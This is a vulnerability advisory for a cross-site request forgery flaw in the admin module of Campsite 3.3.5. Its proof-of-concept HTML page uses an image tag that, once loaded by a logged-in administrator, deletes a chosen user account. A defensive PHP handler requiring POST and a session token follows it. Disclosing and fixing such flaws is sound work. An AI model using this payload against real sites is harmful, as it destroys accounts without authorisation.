=======================================================================
campsite 3.3.5 CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in - Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Category CMS / Portals
# Site page http://www.campware.org/
# Platform php
# Proof of concept #
Targeted URL: http://server/admin/login.php
Script to delete the Admin user through Cross-Site Request Forgery
...................................................................................................................
<html>
<body>
<img src=http://server/admin/users/do_del.php?User=[userID]&uType=Staff />
</body>
</html>
...................................................................................................................
After execution, refresh the page and you can see that the user having the given ID gets deleted automatically.
# If you have any questions, comments, or concerns, feel free to contact me.
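
A defensive counterpart to the proof of concept above, as an added example that is not Campsite's code or the author's: a delete handler that refuses GET and requires a per-session token. The function names, the csrf_token field and the numeric user ID are assumptions for illustration; the request and session are passed in as arrays so the script runs under the PHP CLI.

```php
<?php
// Added example: hypothetical hardened delete handler, not Campsite's code.

// Issue one random token per session; the admin form embeds it in a hidden field.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Return the HTTP status the handler would send for a delete request.
function handle_user_delete(string $method, array $params, array &$session): int {
    // State-changing actions must not be reachable by GET: an <img> tag,
    // as in the proof of concept, can only issue GET requests.
    if ($method !== 'POST') {
        return 405;
    }
    // The token must be present and match the session's copy (constant-time).
    $sent = $params['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 403;
    }
    // Validate the identifier before touching storage (assumed numeric here).
    $id = $params['User'] ?? null;
    if (!is_string($id) || !ctype_digit($id)) {
        return 400;
    }
    // delete_user((int) $id);  // hypothetical storage call
    return 200;
}

// Constructed requests for demonstration.
$session = [];
$token = csrf_token($session);
$cases = [
    'forged GET via <img>'      => ['GET',  ['User' => '7', 'uType' => 'Staff']],
    'forged POST without token' => ['POST', ['User' => '7', 'uType' => 'Staff']],
    'genuine admin form POST'   => ['POST', ['User' => '7', 'uType' => 'Staff', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $params]) {
    printf("%-26s -> %d\n", $label, handle_user_delete($method, $params, $session));
}
```

The three constructed requests return 405, 403 and 200 respectively; only the request carrying the session's token reaches the delete step.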